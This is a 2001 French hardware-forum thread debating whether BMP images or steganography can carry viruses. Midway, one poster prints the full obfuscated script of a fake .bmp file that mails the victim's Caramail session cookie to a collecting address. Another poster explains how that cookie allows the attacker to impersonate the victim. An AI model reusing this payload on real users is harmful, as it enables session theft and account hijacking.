Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1731 connectés 

 


 Mot :   Pseudo :  
 
 Page :   1  2  3  4  5
Auteur Sujet :

Virus en steganographie ? Info ou intox ?

n°472302
sigma_me
Succube en herbe
Posté le 08-12-2001 à 19:01:03  profilanswer
 

Reprise du message précédent :

gizmo a écrit a écrit :

 
 
puisqu'on te dit que c'est impossible, c'est surement une double extension.  



non je connais le gars en question et je te dis que c'est pas une double extension ...
 
en plus ca je sais deja de moi meme qu'a partir d'une terminaison en .bmp on peut faire executer une page HTML et donc des javascript ...

mood
Publicité
Posté le 08-12-2001 à 19:01:03  profilanswer
 

n°472306
jeunejedi
Posté le 08-12-2001 à 19:02:16  profilanswer
 

mais pour quil est virus, il fo qu'il est un bout de code executable, ce qui est pas le cas d'un jpg, franchement je pense que c completement impossible

n°472309
gizmo
Posté le 08-12-2001 à 19:02:54  profilanswer
 

nope. A moins d'avoir préalablement changer l'attribution d'ouverture de l'extension bmp, c'est impossible. Lire un BMP est enfantin et il n'y a besoin d'aucune routine spécifique, donc aucune faille pour une exécution quleconque.

n°472311
sigma_me
Succube en herbe
Posté le 08-12-2001 à 19:04:56  profilanswer
 

gizmo a écrit a écrit :

nope. A moins d'avoir préalablement changer l'attribution d'ouverture de l'extension bmp, c'est impossible. Lire un BMP est enfantin et il n'y a besoin d'aucune routine spécifique, donc aucune faille pour une exécution quleconque.  



donc tu dis que ce que je sais faire puisque j'ai su le faire c'est du mytho ??? :lol:  
 
attendez je vous retrouve ca ... ce genre de magouille est tres utilisé sur caramail pour recuperer les chers et tendres cookies .. mais je ne vais pas expliquer comment ....

n°472338
schumacher
Posté le 08-12-2001 à 19:13:50  profilanswer
 

et jeannot tu vas voir à la fin c moi qui v avoir raison :lol:


---------------
L'impôt appauvrit l'ignorant et enrichit le connaisseur.
n°472368
Tedd007
Posté le 08-12-2001 à 19:26:23  profilanswer
 

gizmo> je suis d'accord avec toi sur le fait que lire un bmp est enfantin, mais si tu fou IE comme viewer par defaut de tes bmp ca ne m'etonnerait meme pas qu'il y ai une faille la dedans pour executer un code quelconque  :)

n°472371
gizmo
Posté le 08-12-2001 à 19:27:33  profilanswer
 

Tedd007 a écrit a écrit :

gizmo> je suis d'accord avec toi sur le fait que lire un bmp est enfantin, mais si tu fou IE comme viewer par defaut de tes bmp ca ne m'etonnerait meme pas qu'il y ai une faille la dedans pour executer un code quelconque  :)  




 
et encore, ca m'étonnerait qu'ils laissent une bourde pareil d'une version a l'autre, si elle existe..

n°472372
sigma_me
Succube en herbe
Posté le 08-12-2001 à 19:28:00  profilanswer
 

J'essaye de prouver que les bmp permettent de transporter du code mais multimania veut pas me permttre d'upper le truc ...

n°472374
gizmo
Posté le 08-12-2001 à 19:28:38  profilanswer
 

sigma_me a écrit a écrit :

J'essaye de prouver que les bmp permettent de transporter du code mais multimania veut pas me permttre d'upper le truc ...  




mail.

n°472381
Tedd007
Posté le 08-12-2001 à 19:31:58  profilanswer
 

sigma_me a écrit a écrit :

J'essaye de prouver que les bmp permettent de transporter du code mais multimania veut pas me permttre d'upper le truc ...  




 
Je suis d'accord avec toi... on peut TRANSPORTER du code, mais de la a l'executer...

mood
Publicité
Posté le 08-12-2001 à 19:31:58  profilanswer
 

n°472392
sigma_me
Succube en herbe
Posté le 08-12-2001 à 19:36:33  profilanswer
 

Oki je mail l'exemple que j'ai trouvé a guizmo ...
 
je l'ai mis sous zip pour m'eviter de l'ouvrir par erreur (ne sachant pas si caramail avait desactivé ce code ou pas)

n°472404
sigma_me
Succube en herbe
Posté le 08-12-2001 à 19:43:29  profilanswer
 

j'ai envoyé le bmp enfin soit disant bmp et en fait voici ce que l'on obtiens quand au lieu de le telecharger en bmp on le telecharge en .txt :
 
<script>
<!--
document.write(unescape("%3Chtml%3E%0D%0A%3Cbody%20ONLOAD%3D%22window.location%3D%27http%3A//www30.caramail.com/cgi-bin/SelectAction%3FDEALIAS%3D0%26MAILTO%3Dpar.ici.le.cookie@caramail.com%26SUBJECT%3D%26BODY%3D%27%20+%20window.document.cookie%20+%20%27%26TARGETACTION%3DNONE%27%3B%22%3E%0D%0A%3C/body%3E%20%0D%0A%3C/html%3E" ));
//-->
<!--AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//-->
</script>
 
 
j'ai coupé les A ... logiquement y en a bcp plus juste pour faire grimper la taille du fichier et faire reelement croire que c un bmp

 

[edtdd]--Message édité par sigma_me--[/edtdd]

n°472419
gizmo
Posté le 08-12-2001 à 19:52:17  profilanswer
 

bon j'ai toujours pas recu ton mail, mais en attendant, j'ai testé le code que tu a mis ici et:
 
- ACDSEE m'ouvre un image vide
- Opera m'ouvre une image non chargée
- IE m'ouvre ACDSEE
 
... alors j'espère que le mail sera plus concluant pour toi.

n°472423
Tedd007
Posté le 08-12-2001 à 19:54:10  profilanswer
 

N'importe quel viewer te montrera ou rien ou un message d'erreur.  Maintenant peut etre que caramail est assez con pour interpreter les images bmp comme etant des script html :-))

n°472425
sigma_me
Succube en herbe
Posté le 08-12-2001 à 19:56:01  profilanswer
 

Pas que caramail ...

n°472429
sigma_me
Succube en herbe
Posté le 08-12-2001 à 20:00:08  profilanswer
 

Bref apparement de toute facon parler avec vous est cause perdue ...  
 
a partir du moment ou c faisable que ca vienne de caramail de ie ou de jenesaisquoi... que ce script que j'ai copier la se presente sous l'icone d'un .bmp et sous son extension montre bien que c'est réalisable !  
 
apres est ce que c'est possible que de réels virus se cachent le dessous pk pas !!

n°472432
Tedd007
Posté le 08-12-2001 à 20:03:50  profilanswer
 

C'est claire que si IE a reellement une faille permettant d'executer ce genre de fichier c'est une grosse faille...

n°472435
sigma_me
Succube en herbe
Posté le 08-12-2001 à 20:06:36  profilanswer
 

apres moi je garantie pas dans la réalisation ce qui est possible ou pas ...
 
hélas j'ai toujours pas le courage de me mettre a programmer mais etant donné que ie et autres navigateurs gerent des script ... on peut parler des css par exemple ... ca peut entrainer bcp de chose ...

n°472486
wpk
Posté le 08-12-2001 à 21:05:24  profilanswer
 

je me suis bien marré en lisant ce tomic (surtout sigma)
 
pour info, ton script ne peut etre executé si placé dans un fichier .bmp pour la simple et bonne raison que toute appli qui essaye de lire un fichier bmp, s'attend à trouver une signature BM pour un bmp et un format bien specifique. Ton script ne satisfait nullement à ces exigences et donc toute application sachant lire un bmp, te dira gentillement ton fichier est merdique j'en veux pas. Pour info, j'ai essayé avec IE (au cas ou les gros cons de chez mikeysoft auraient eu la bonne idee d'interpreter du
script dans un bmp et rien, kedale, ton script ne marche pas et ne pourra jamais marcher avec comme extenssion .bmp)
 
Quant aux fantasmes sur du buffer overrun, les chances pour que ca puisse se produire sont infimes. Meme si qcqn arrive à trouver une faille, elle ne concernera qu'une seule appli...

n°472490
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:10:27  profilanswer
 

wpk a écrit a écrit :

je me suis bien marré en lisant ce tomic (surtout sigma)
 
pour info, ton script ne peut etre executé si placé dans un fichier .bmp pour la simple et bonne raison que toute appli qui essaye de lire un fichier bmp, s'attend à trouver une signature BM pour un bmp et un format bien specifique. Ton script ne satisfait nullement à ces exigences et donc toute application sachant lire un bmp, te dira gentillement ton fichier est merdique j'en veux pas. Pour info, j'ai essayé avec IE (au cas ou les gros cons de chez mikeysoft auraient eu la bonne idee d'interpreter du
script dans un bmp et rien, kedale, ton script ne marche pas et ne pourra jamais marcher avec comme extenssion .bmp)
 
Quant aux fantasmes sur du buffer overrun, les chances pour que ca puisse se produire sont infimes. Meme si qcqn arrive à trouver une faille, elle ne concernera qu'une seule appli...  



alors je suis tout ouie ... comment est ce qu'en ouvrant ce fichier notre joli cookie caramail partait dans la boite spécifié ???
 
tours de magie ... je ne crois pas que david copperfiel est le temps pour ca

n°472492
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:14:11  profilanswer
 

autre exemple dans le meme genre ne connaissez vous pas les bmp caché dans un .txt ?

n°472496
wpk
Posté le 08-12-2001 à 21:17:16  profilanswer
 

sigma_me a écrit a écrit :

alors je suis tout ouie ... comment est ce qu'en ouvrant ce fichier notre joli cookie caramail partait dans la boite spécifié ???
 
tours de magie ... je ne crois pas que david copperfiel est le temps pour ca  




 
si tu ne me crois pas, fais le test toi meme : tu cree un nouveau fichier, tu y colle le script, tu changes son extenssion en bmp puis tu ouvres avec IE. Moi tout ce que j'ai constaté c'est que IE prend le bmp, voit que l'image est foireuse et me met un X rouge...

n°472498
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:18:54  profilanswer
 

wpk a écrit a écrit :

 
 
si tu ne me crois pas, fais le test toi meme : tu cree un nouveau fichier, tu y colle le script, tu changes son extenssion en bmp puis tu ouvres avec IE. Moi tout ce que j'ai constaté c'est que IE prend le bmp, voit que l'image est foireuse et me met un X rouge...  



sauf que ce n'est pas fait comme ca a la base c'est pour ca que tu ne peux pas le reproduire !!

n°472499
Jer
Posté le 08-12-2001 à 21:19:46  profilanswer
 

C'est juste que caramail ne se base pas sur l'extention du fichier pour déterminer la façon de l'ouvrir mais sur le contenu (ou l'entête).
Donc il va interpêter le script tout simplement et non tanter de l'ouvrir comme étant un bmp.

n°472508
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:26:10  profilanswer
 

je dis juste que ce que j'ai envoyer a guizmo, et qui apparement sous windows se concretise sous l'icone bmp et l'extension bmp alors que ca n'en est pas un, n'est qu'un exemple...
 
un .txt peut cacher une image .bmp  
ca c'est les exemples que je connais pour les avoir eu en main alors pk s'attendre a plus important ?
 
c'est surtout la que je veux en venir ... et que je veux qu'on me prouve reelement que ce n'est pas possible ...

n°472510
wpk
Posté le 08-12-2001 à 21:27:55  profilanswer
 

Jer a écrit a écrit :

C'est juste que caramail ne se base pas sur l'extention du fichier pour déterminer la façon de l'ouvrir mais sur le contenu (ou l'entête).
Donc il va interpêter le script tout simplement et non tanter de l'ouvrir comme étant un bmp.  




 
la je vous suis plus, à quel moment ce script est censé s'executer d'aprez vous ? parce que s'il est executé sur le serveur de caramail, on s'en fout completement s'ils sont suffisament stupides pour permettre ce genre de comportement aberrant tant pis pour eux. Par contre je suis sur ke sur ma machine, en tant que bmp, ce script ne sera pas executé.

n°472517
skeye
Posté le 08-12-2001 à 21:31:52  profilanswer
 

sigma_me a écrit a écrit :

je dis juste que ce que j'ai envoyer a guizmo, et qui apparement sous windows se concretise sous l'icone bmp et l'extension bmp alors que ca n'en est pas un, n'est qu'un exemple...
 
un .txt peut cacher une image .bmp  
ca c'est les exemples que je connais pour les avoir eu en main alors pk s'attendre a plus important ?
 
c'est surtout la que je veux en venir ... et que je veux qu'on me prouve reelement que ce n'est pas possible ...  




un bmp est une suite de chiffres...un prog pour l'afficher ne fait ke lire ces chiffres dans l'ordre ou ils arrivent et afficher pour chake pixel la couleur correspondante (je simplifie un peu...:D), donc aucun code ne peut etre exécuté là-dedans...


---------------
Can't buy what I want because it's free -
n°472524
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:35:25  profilanswer
 

j'ai pas tout suivi mais tu parles de chiffres pour un bmp je pense donc hexadecimal ...
(euh tu me parles de bmp poru quel exemples celui du script cara ? ou du txt ? )
 
hexa me fait penser aussi a ce qui est possible en assembleur il me semble mais la je commence a m'embrouiller je crois.

n°472525
Jer
Posté le 08-12-2001 à 21:35:32  profilanswer
 

wpk a écrit a écrit :

 
 
la je vous suis plus, à quel moment ce script est censé s'executer d'aprez vous ? parce que s'il est executé sur le serveur de caramail, on s'en fout completement s'ils sont suffisament stupides pour permettre ce genre de comportement aberrant tant pis pour eux. Par contre je suis sur ke sur ma machine, en tant que bmp, ce script ne sera pas executé.  




 
Ben si justement caramail spécifie la liste des fichiers attachés (donc ton script qui est en fait une petite page html avec l'extention bmp) et qd tu cliques dessus il l'ouvre comme étant une page html et donc le script s'exécute.
Celà permet par exemple comme cité plus haut de se faire envoyer par mail le cookie de la personne ayant exécuté ce script et avec ce cookie se faire passer pour cette personnes auprès du serveur pour une durée de 6h (après quoi le cookie de session n'est plus valide)
Cela a été testé et aprouvé, ça marche.
Enfin avant c'était bien plus dramatique on pouvait y'a pas si longtmps, envoyer des mail en html sur cara et cacher des scripts à l'interreur même d'un tag <img> là l'exécution du script était forcée sans avoir besoin de faire cliquer la victime sur quoi que ce sois, heureusement cette faille a été corrigée mais il en reste encore bcp d'autre...

 

[edtdd]--Message édité par Jer--[/edtdd]

n°472526
STARWING
Posté le 08-12-2001 à 21:36:20  profilanswer
 

Ouai je commence a y voir clair et aussi l'origine de cette rumeur , ce qui est valable pour caramail ne le sera pas pour une piece jointe par email...
 
Et ce qui est de recuperer un cookies n'est pas la meme chose que d'infecter un pc...
 
Tient pour ceux qui ne font que lire ce topic voici une liste d'extension contenent du code excutable et donc possible d'avoir des propriétés virale :
 
 
.ade: Microsoft Access project extension
.adp: Microsoft Access project
.bas: Microsoft Visual Basic class module
.bat: Batch file
.chm: Compiled HTML Help file
.cmd: Microsoft Windows NT Command script
.com: Microsoft MS-DOS program
.cpl: Control Panel extension
.crt: Security certificate
.exe: Program
.hlp: Help file
.hta: HTML program
.inf: Setup Information
.ins: Internet Naming Service
.isp: Internet Communication settings
.js: JScript file
.jse: Jscript Encoded Script file
.lnk: Shortcut
.mdb: Microsoft Access program
.mde: Microsoft Access MDE database
.msc: Microsoft Common Console document
.msi: Microsoft Windows Installer package
.msp: Microsoft Windows Installer patch
.mst: Microsoft Visual Test source files
.pcd: Photo CD image, Microsoft Visual compiled script
.pif: Shortcut to MS-DOS program
.reg: Registration entries
.scr: Screen saver
.sct: Windows Script Component
.shs: Shell Scrap object
.shb: Shell Scrap object
.url: Internet shortcut
.vb: VBScript file
.vbe: VBScript Encoded script file
.vbs: VBScript file
.wsc: Windows Script Component
.wsf: Windows Script file
.wsh: Windows Script Host Settings file
 
Y'a d'autre extension arajouter a cette liste ?

n°472527
wpk
Posté le 08-12-2001 à 21:36:37  profilanswer
 

si tu veux sigma, je suis pret à te mettre un bout de code C++ qui permet de lire un .bmp et la tu pourra voir ke ca ne peut en aucun cas interpreter du scrip.

n°472529
cablator
Topiks uniks pensée unik!
Posté le 08-12-2001 à 21:37:20  profilanswer
 

Réponse sur un autre forum:
 
"
 
Auteur: Roland Garcia (---.abo.wanadoo.fr)
Date:   07-12-01 23:43
 
On peut cacher un virus dans ce qu'on veut, une archive ZIP avec mot de passe, dans une image par stéganographie, un fichier codé PGP etc....
On a caché un virus mais on n'a pas un virus.
 
Les fichiers ZIP, MP3, GIF, JPEG, PGP etc.... ne sont jamais des virus.
 
"


---------------
Viva la Revolucion ©
n°472531
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:40:20  profilanswer
 

wpk a écrit a écrit :

si tu veux sigma, je suis pret à te mettre un bout de code C++ qui permet de lire un .bmp et la tu pourra voir ke ca ne peut en aucun cas interpreter du scrip.  



Oui mais le c++ est langage de programmation certes ... mais dans ma logique je pensais plus au possibilité de l'assembleur ...

n°472534
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:41:20  profilanswer
 

cablator a écrit a écrit :

Réponse sur un autre forum:
 
"
 
Auteur: Roland Garcia (---.abo.wanadoo.fr)
Date:   07-12-01 23:43
 
On peut cacher un virus dans ce qu'on veut, une archive ZIP avec mot de passe, dans une image par stéganographie, un fichier codé PGP etc....
On a caché un virus mais on n'a pas un virus.
 
Les fichiers ZIP, MP3, GIF, JPEG, PGP etc.... ne sont jamais des virus.
 
"  



donc en gros y a presence d'un virus sans activation de celui ci ? j'ai bien compris cette fois ?
 
(me laisse quand meme perplexe)

n°472538
skeye
Posté le 08-12-2001 à 21:42:46  profilanswer
 

sigma_me a écrit a écrit :

j'ai pas tout suivi mais tu parles de chiffres pour un bmp je pense donc hexadecimal ...
(euh tu me parles de bmp poru quel exemples celui du script cara ? ou du txt ? )
 
hexa me fait penser aussi a ce qui est possible en assembleur il me semble mais la je commence a m'embrouiller je crois.  




nope, composantes RGB!


---------------
Can't buy what I want because it's free -
n°472544
wpk
Posté le 08-12-2001 à 21:46:51  profilanswer
 

sigma_me a écrit a écrit :

Oui mais le c++ est langage de programmation certes ... mais dans ma logique je pensais plus au possibilité de l'assembleur ...  




 
j'ai aussi fait de l'assembleur, et je peux t'assurer que c'est impossible. L'assembleur ce n'est qu'un language qui permet d'associer des mnemoniques aux opcodes (les codes hexa) il est donc plus simple d'ecrire nop que de mettre un 0x90 ou int à la place de 0xCD etc. Par contre pour que le systeme puisse interpreter du code, il faut tout plein de choses : une bonne extenssion (.exe ou .com .pif ....) et un format specifique pour le programme.

n°472547
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:53:28  profilanswer
 

euh la franchement vous commencez a me larguer ... (va vraiment falloir que je reprenne des etudes enfin des etudes en info moi)
 
cependant sans mettre en doute les réponses de chacun je vais quand meme demander l'avis de mon spécialiste en la matière enfin du moins si je le trouve :(

n°472552
kaltan1
Posté le 08-12-2001 à 21:57:46  profilanswer
 

alors possible ou non?

n°472553
sigma_me
Succube en herbe
Posté le 08-12-2001 à 21:58:41  profilanswer
 

apparement non ...
 
mais je garde toujours le doute

n°472555
skeye
Posté le 08-12-2001 à 21:59:16  profilanswer
 

sigma_me a écrit a écrit :

euh la franchement vous commencez a me larguer ... (va vraiment falloir que je reprenne des etudes enfin des etudes en info moi)
 
cependant sans mettre en doute les réponses de chacun je vais quand meme demander l'avis de mon spécialiste en la matière enfin du moins si je le trouve :(  




à première vue on est plusieurs programmeurs là et certains à avoir étudié le format bmp...je t'assure k'il n'y a absolument pas de moyen de faire exécuter du code par un logiciel d'affichage de bmp...ou alors c le programmeur du logiciel ki voulait pouvoir faire d conneries! :lol:


---------------
Can't buy what I want because it's free -
n°472557
sigma_me
Succube en herbe
Posté le 08-12-2001 à 22:02:23  profilanswer
 

skeye a écrit a écrit :

 
à première vue on est plusieurs programmeurs là et certains à avoir étudié le format bmp...je t'assure k'il n'y a absolument pas de moyen de faire exécuter du code par un logiciel d'affichage de bmp...ou alors c le programmeur du logiciel ki voulait pouvoir faire d conneries! :lol:  



question encore : vous parlez d'ouvrir l'image avec un logiciel spécifié ... en double cliquant sur l'icone de l'image ne peut-elle pas choisir de s'ouvrir dans autre chose que les logiciels d'image ?
 
euh c'est un peu tordu mais bon j'essaye d'imaginer des trucs

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4  5

Aller à :
Ajouter une réponse
 

Sujets relatifs
[URGENT]Virus Nimda - infection Serveur Entreprise - aidevirus ou pas virus?? Solution
VIRUS - HybrisInfo sur ghost 2002
Outlook Express met deux plombes pour s'ouvrir ! (virus WIN95.CIH ! )Comment supprimer cet horrible virus???
Un virus peut-il cramer un proc?quel site compare les Anti-virus???
Que vaut Norton anti-virus 2002 
Plus de sujets relatifs à : Virus en steganographie ? Info ou intox ?


Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)